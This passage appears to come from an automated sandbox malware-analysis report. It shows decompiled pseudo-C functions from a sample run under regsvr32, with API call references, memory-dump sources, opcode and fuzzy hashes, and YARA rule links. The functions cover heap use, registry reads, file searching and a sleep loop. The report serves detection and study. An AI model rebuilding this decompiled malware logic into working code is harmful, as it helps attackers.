							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x00f4718a
0x00f4718f
0x00f4719d
0x00f471a3
0x00f471a7
0x00f47218
0x00f471a9
0x00f471ad
0x00f471b0
0x00f471b3
0x00f471ba
0x00f471bb
0x00f471bc
0x00f471c0
0x00f471c3
0x00f471ca
0x00f471d0
0x00f471d1
0x00f471d1
0x00f471d8
0x00f471d9
0x00f471da
0x00f471de
0x00f471ea
0x00f471f0
0x00f471f1
0x00f471f1
0x00f471f3
0x00f471f9
0x00f471fb
0x00f47200
0x00f47201
0x00f47201
0x00f47207
0x00f47210
0x00f47212
0x00f47215
0x00f47224

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F4719D

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4a29a158c93ed4a3c799a31cd3007e7f7e5dad0f9d14644b1388bab851f0b584
Instruction ID: 8c5bedd43ba4e819c491349d4a413331c63259ecce318b5864e280444bd75348
Opcode Fuzzy Hash: 4a29a158c93ed4a3c799a31cd3007e7f7e5dad0f9d14644b1388bab851f0b584
Instruction Fuzzy Hash: 731106316893449FEB058F2DC851BE97FA5EB67368F14408AE8409B292C2778A0BC760

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A30A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00F4A30A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t20;
				short _t22;
				short _t30;
				intOrPtr _t36;
				intOrPtr _t37;

				_t30 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t20 =  *0xf4d27c; // 0x47ea5a8
				_t4 = _t20 + 0xf4e10c; // 0x57386b4
				_t6 = _t20 + 0xf4e2c0; // 0x650047
				_t36 = 0;
				_t22 = E00F489FA(_t4, _a4, _a8, _a12, _t6, _a16, _t4,  &_v20); // executed
				if(_t22 < 0) {
					_t30 = _t22;
				} else {
					if(_v20 != 0x2011) {
						_t30 = 1;
					} else {
						_t37 =  *((intOrPtr*)(_v12 + 0x10));
						if(_t37 != 0) {
							_t36 = E00F43727(_t37);
							if(_t36 == 0) {
								_t30 = 8;
							} else {
								E00F4A880(_t37,  *((intOrPtr*)(_v12 + 0xc)), _t36);
							}
						}
						 *_a20 = _t36;
						 *_a24 = _t37;
						__imp__#16(_v12);
					}
				}
				return _t30;
			}

0x00f4a315
0x00f4a317
0x00f4a31e
0x00f4a31f
0x00f4a320
0x00f4a321
0x00f4a327
0x00f4a32c
0x00f4a336
0x00f4a340
0x00f4a348
0x00f4a34f
0x00f4a39c
0x00f4a351
0x00f4a357
0x00f4a399
0x00f4a359
0x00f4a35c
0x00f4a361
0x00f4a369
0x00f4a36d
0x00f4a381
0x00f4a36f
0x00f4a378
0x00f4a378
0x00f4a36d
0x00f4a388
0x00f4a38d
0x00f4a38f
0x00f4a38f
0x00f4a357
0x00f4a3a4

APIs

Part of subcall function 00F489FA: SysFreeString.OLEAUT32(?), ref: 00F48AD9

SafeArrayDestroy.OLEAUT32(00000000), ref: 00F4A38F

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateArrayDestroyFreeHeapSafeString
String ID:
API String ID: 3028586731-0
Opcode ID: a3eabe2912df3c5a7996886facbe6c724f43c70686b8b1e31ab97fa7f928a1c5
Instruction ID: 1d7aa01b8c6a4b56f443936da49adeb8dcbbc56cfb7973ec1feeb6783108109d
Opcode Fuzzy Hash: a3eabe2912df3c5a7996886facbe6c724f43c70686b8b1e31ab97fa7f928a1c5
Instruction Fuzzy Hash: CD118276640109AFCB11DFA8CC80CAEBBB9FB49314B1144A5FE11D7121E772DE45EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F48E7C, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00F48E7C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xf4d27c; // 0x47ea5a8
				_t4 = _t15 + 0xf4e39c; // 0x5738944
				_t20 = _t4;
				_t6 = _t15 + 0xf4e124; // 0x650047
				_t17 = E00F489FA(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00F4499C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00f48e86
0x00f48e88
0x00f48e8f
0x00f48e90
0x00f48e91
0x00f48e92
0x00f48e98
0x00f48e9d
0x00f48e9d
0x00f48ea7
0x00f48eb9
0x00f48ec0
0x00f48eef
0x00f48ec2
0x00f48ec7
0x00f48eec
0x00f48ec9
0x00f48ecc
0x00f48ed3
0x00f48ede
0x00f48ed5
0x00f48ed8
0x00f48ed8
0x00f48ee2
0x00f48ee2
0x00f48ec7
0x00f48ef6

APIs

Part of subcall function 00F489FA: SysFreeString.OLEAUT32(?), ref: 00F48AD9

Part of subcall function 00F4499C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00F446CA,004F0053,00000000,?), ref: 00F449A5
Part of subcall function 00F4499C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00F446CA,004F0053,00000000,?), ref: 00F449CF
Part of subcall function 00F4499C: memset.NTDLL ref: 00F449E3

SysFreeString.OLEAUT32(00000000), ref: 00F48EE2

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 41b7a8caaf09471f396dd2f3c7431e751d898da252eb948db67c8b840cd812e5
Instruction ID: ee43d481e86ddd58c6e51a75c7e9a941d691278f9c9888cf8e73c783f892ea0e
Opcode Fuzzy Hash: 41b7a8caaf09471f396dd2f3c7431e751d898da252eb948db67c8b840cd812e5
Instruction Fuzzy Hash: C6015E3250001DBFCB119FE8CC04EAEBFB8FB48790B004455EE06E7120E7B19956B791

Uniqueness

Uniqueness Score: -1.00%

Function 00F47227, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00F47227(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E00F47185(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0xf4d27c; // 0x47ea5a8
						_t9 = _t17 + 0xf4ea58; // 0x444f4340
						_t20 = E00F48930( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0xf4d238, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x00f4722a
0x00f47230
0x00f47287
0x00f47236
0x00f47241
0x00f47246
0x00f4724a
0x00f47257
0x00f4725f
0x00f4726b
0x00f47273
0x00f4727d
0x00f4727d
0x00f4724a
0x00f4728c

APIs

Part of subcall function 00F47185: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F4719D

Part of subcall function 00F48930: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00F48964
Part of subcall function 00F48930: StrStrA.SHLWAPI(00000000,?), ref: 00F48971
Part of subcall function 00F48930: RtlAllocateHeap.NTDLL(00000000,?), ref: 00F48990

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00F48727), ref: 00F4727D

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID:
API String ID: 2220322926-0
Opcode ID: 3051f68508227d09092c721149699eb86ff1b6e39b9e603d90544214a06bc906
Instruction ID: 56beff672dd4ea4d52adffcb405f737fb998e3b80270218e8d133635476b078e
Opcode Fuzzy Hash: 3051f68508227d09092c721149699eb86ff1b6e39b9e603d90544214a06bc906
Instruction Fuzzy Hash: 3D01817A100608FFDB11DF55CC00FAABBA9EB54390F114225FD0596160EB72EA45FB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F46EF8, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F46EF8(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xf4d238, 0, _a4); // executed
				return _t2;
			}

0x00f46f04
0x00f46f0a

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7852dd7c7e0ba65a1edc54e32857874ef5fa57694c8408fbdd548c5a2af1a21a
Instruction ID: f7b9971fa355bb1a5a63eaab94a22c58809a2f3068d723d41afac8dcd0cf7211
Opcode Fuzzy Hash: 7852dd7c7e0ba65a1edc54e32857874ef5fa57694c8408fbdd548c5a2af1a21a
Instruction Fuzzy Hash: 8AB01239001104EBCA014B10ED08F05BB21AB71700F028010F6004407483714420FB15

Uniqueness

Uniqueness Score: -1.00%

Function 00F43727, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F43727(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xf4d238, 0, _a4); // executed
				return _t2;
			}

0x00f43733
0x00f43739

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dc7e56197aebea309e2437a1def54a90f750214e7ef3c6d978bdd1e30c44ab7c
Instruction ID: b0fb6810709348f3db618351b809aa9a4e32784d519e3925ec3affd5e8235210
Opcode Fuzzy Hash: dc7e56197aebea309e2437a1def54a90f750214e7ef3c6d978bdd1e30c44ab7c
Instruction Fuzzy Hash: C7B0123E400104EBCA114B10DD04F05BF21AB75700F004110F60484070C3714860FB05

Uniqueness

Uniqueness Score: -1.00%

Function 00F4924D, Relevance: 1.3, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4924D(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				int _v60;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _t35;
				void* _t40;
				void* _t49;
				void* _t51;
				int _t57;
				void* _t60;
				void* _t61;

				_t51 = _a4;
				_t57 = 0;
				_t58 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_a4 = 0;
				if(__ecx <= 0x40 ||  *__eax != 0x200) {
					L21:
					return _t57;
				} else {
					_t6 = _t58 - 0x40; // 0xf49f2b
					_t55 =  &_v92;
					_t35 = E00F4566C(__eax,  &_v92, __edx,  &_v92,  &_v12, _t51 + _t6);
					if(_t35 != 0) {
						goto L21;
					}
					_t59 = __ecx - 0x40;
					if(_v60 > __ecx - 0x40) {
						goto L21;
					}
					while( *((char*)(_t61 + _t35 - 0x48)) == 0) {
						_t35 = _t35 + 1;
						if(_t35 < 0x10) {
							continue;
						}
						_t57 = _v60;
						_t49 = E00F43727(_t57);
						_t70 = _t49;
						_a4 = _t49;
						if(_t49 != 0) {
							_t57 = 0;
							L18:
							if(_t57 != 0) {
								goto L21;
							}
							L19:
							if(_a4 != 0) {
								E00F46EF8(_a4);
							}
							goto L21;
						}
						memcpy(_t49, _t51, _t57);
						L8:
						_t60 = _a4;
						E00F48054(_t55, _t70, _t60, _t57,  &_v28);
						if(_v28 != _v92 || _v24 != _v88 || _v20 != _v84 || _v16 != _v80) {
							L15:
							_t57 = 0;
							goto L19;
						} else {
							 *_a8 = _t60;
							goto L18;
						}
					}
					_t40 = E00F451AA(_t59, _t51,  &_a4,  &_v8,  &_v76, 0); // executed
					__eflags = _t40;
					if(_t40 != 0) {
						_t57 = _v8;
						goto L18;
					}
					_t57 = _v60;
					__eflags = _v8 - _t57;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x00f49254
0x00f49259
0x00f4925b
0x00f49260
0x00f49263
0x00f49266
0x00f49269
0x00f4933d
0x00f49343
0x00f4927b
0x00f4927b
0x00f49284
0x00f49288
0x00f4928f
0x00000000
0x00000000
0x00f49295
0x00f4929b
0x00000000
0x00000000
0x00f492a1
0x00f492a8
0x00f492ac
0x00000000
0x00000000
0x00f492ae
0x00f492b2
0x00f492b7
0x00f492b9
0x00f492bc
0x00f49324
0x00f4932b
0x00f4932d
0x00000000
0x00000000
0x00f4932f
0x00f49333
0x00f49338
0x00f49338
0x00000000
0x00f49333
0x00f492c1
0x00f492c9
0x00f492c9
0x00f492d2
0x00f492dd
0x00f49320
0x00f49320
0x00000000
0x00f492f7
0x00f492fa
0x00000000
0x00f492fa
0x00f492dd
0x00f4930f
0x00f49314
0x00f49316
0x00f49328
0x00000000
0x00f49328
0x00f49318
0x00f4931b
0x00f4931e
0x00000000
0x00000000
0x00000000
0x00f4931e

APIs

memcpy.NTDLL(00000000,00F49F6B,?,?,?,00F49F6B,00F49F2B,00000002,00F49F6B,00F49F6B), ref: 00F492C1

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a620f4689c48fa591fc3f23790f24d0c9d9e07b2d4cf3a6bab0f6675acc6b2d4
Instruction ID: fba669fb4a048f2b610b6c13d9ccf5d78f20686ea080e518989d144dae0b8c5e
Opcode Fuzzy Hash: a620f4689c48fa591fc3f23790f24d0c9d9e07b2d4cf3a6bab0f6675acc6b2d4
Instruction Fuzzy Hash: C4314F72E08108ABDF11DF94C8809EFBFBDAB55360F604015ED15E7181D7B4AE85EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F441FE, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00F441FE(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xf4d330;
				E00F480DF();
				while(1) {
					_t8 = E00F47DA3(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00F44FD8(_t14);
					if(_t15 == 0) {
						HeapFree( *0xf4d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00F480DF();
					if(_t19 != 0) {
						_t22 =  *0xf4d338; // 0x57398b0
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x00f44206
0x00f4420a
0x00f4420b
0x00f4420c
0x00f44211
0x00f44216
0x00f4421d
0x00f44224
0x00000000
0x00000000
0x00f44226
0x00f4422b
0x00f4422c
0x00f44233
0x00f4424d
0x00000000
0x00f44235
0x00f44235
0x00f44237
0x00f4423a
0x00f4423e
0x00000000
0x00000000
0x00f44240
0x00f4423e
0x00f44255
0x00f44255
0x00f44257
0x00f4425e
0x00f44260
0x00f44266
0x00f4426d
0x00f4427d
0x00f44275
0x00f44278
0x00f44278
0x00f44280
0x00f44280
0x00f44289
0x00f44289
0x00f44253
0x00000000

APIs

Part of subcall function 00F480DF: GetProcAddress.KERNEL32(36776F57,00F44216), ref: 00F480FA

Part of subcall function 00F47DA3: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00F47DCE
Part of subcall function 00F47DA3: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00F47DF0
Part of subcall function 00F47DA3: memset.NTDLL ref: 00F47E0A
Part of subcall function 00F47DA3: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00F47E48
Part of subcall function 00F47DA3: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00F47E5C
Part of subcall function 00F47DA3: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F47E73
Part of subcall function 00F47DA3: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00F47E7F
Part of subcall function 00F47DA3: lstrcat.KERNEL32(?,642E2A5C), ref: 00F47EC0
Part of subcall function 00F47DA3: FindFirstFileA.KERNELBASE(?,?), ref: 00F47ED6

Part of subcall function 00F44FD8: lstrlen.KERNEL32(?,00000000,00F4D330,00000001,00F44231,00F4D00C,00F4D00C,00000000,00000005,00000000,00000000,?,?,?,00F493A5,00F459DA), ref: 00F44FE1
Part of subcall function 00F44FD8: mbstowcs.NTDLL ref: 00F45008
Part of subcall function 00F44FD8: memset.NTDLL ref: 00F4501A

HeapFree.KERNEL32(00000000,00F4D00C,00F4D00C,00F4D00C,00000000,00000005,00000000,00000000,?,?,?,00F493A5,00F459DA,00F4D00C,?,00F459DA), ref: 00F4424D

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: 9917f4406b5ca81f8b87dbdbe5a667c08150c82e62b61b93bb5e78ad36024a5f
Instruction ID: a77d7a197c24963e811d78f084deb47044eab112b69d1949a9ac4e6932eea7ad
Opcode Fuzzy Hash: 9917f4406b5ca81f8b87dbdbe5a667c08150c82e62b61b93bb5e78ad36024a5f
Instruction Fuzzy Hash: 71012836A10204ABEB009FE6DC81B7E7F99EF42364F500036FD45E6050D6F4AE81B665

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A3A7, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F4A3A7(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00F48E7C(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00F482C4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xf4d238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x00f4a3af
0x00f4a404
0x00f4a409
0x00f4a3b1
0x00f4a3cb
0x00f4a3cf
0x00f4a3d4
0x00f4a3d6
0x00f4a3e6
0x00f4a3f2
0x00f4a3d8
0x00f4a3d8
0x00f4a3db
0x00f4a3e0
0x00f4a3e0
0x00f4a3d6
0x00f4a3cf
0x00f4a40f

APIs

Part of subcall function 00F482C4: RegCloseKey.ADVAPI32(80000002,?,00F49CE1,3D00F4C0,80000002,00F437CC,00000000,00F437CC,?,65696C43,80000002,00000000,?), ref: 00F4835B

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00F43B5D,?,004F0053,05739388,00000000,?), ref: 00F4A3F2

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: de82c5e47e70b4f1d10cf9886824cc19582598876f73e3412a7a015aa4a5581c
Instruction ID: 02263c5233e3d8f466020bbd57543f2e8a697f5deddadc60060c095db1116d28
Opcode Fuzzy Hash: de82c5e47e70b4f1d10cf9886824cc19582598876f73e3412a7a015aa4a5581c
Instruction Fuzzy Hash: B1014632140649EBCF22CF54CC05FAE3B69FBA4360F148429FE198A160DA71D922EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00F44CD6, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F44CD6(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00f44cd6
0x00f44ce3
0x00f44ce4
0x00f44ce5
0x00f44cec
0x00f44d1a
0x00f44d1b
0x00f44d1e
0x00f44d24
0x00000000
0x00000000
0x00f44d03
0x00f44d0d
0x00f44d14
0x00000000
0x00f44d05
0x00f44d08
0x00f44d28
0x00f44d0a
0x00f44d0a
0x00000000
0x00f44d0a
0x00f44d08
0x00f44d2f
0x00f44d35
0x00f44d35
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00F44D1E

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3c5006ac3a632a3856f5db00f4966418efbcb8ef9de1eb659262196eca7882c6
Instruction ID: 9293eed3a4d39f35bb8a9516b2577d21b838c46d5fe7e7e2d2cfd399b69f80f0
Opcode Fuzzy Hash: 3c5006ac3a632a3856f5db00f4966418efbcb8ef9de1eb659262196eca7882c6
Instruction Fuzzy Hash: E1F0EC75D01119EFDB10DB94D488AEDBBB8FF05715F1480AAE902A7240D7B46B44EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F470E0, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00F437CC,?,?,00F49DCE,3D00F4C0,80000002,00F437CC,00F48C69,74666F53,4D4C4B48,00F48C69,?,3D00F4C0,80000002,00F437CC,?), ref: 00F47100

Part of subcall function 00F4A412: SysAllocString.OLEAUT32(00F48C69), ref: 00F4A42C
Part of subcall function 00F4A412: SysFreeString.OLEAUT32(00000000), ref: 00F4A46C

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
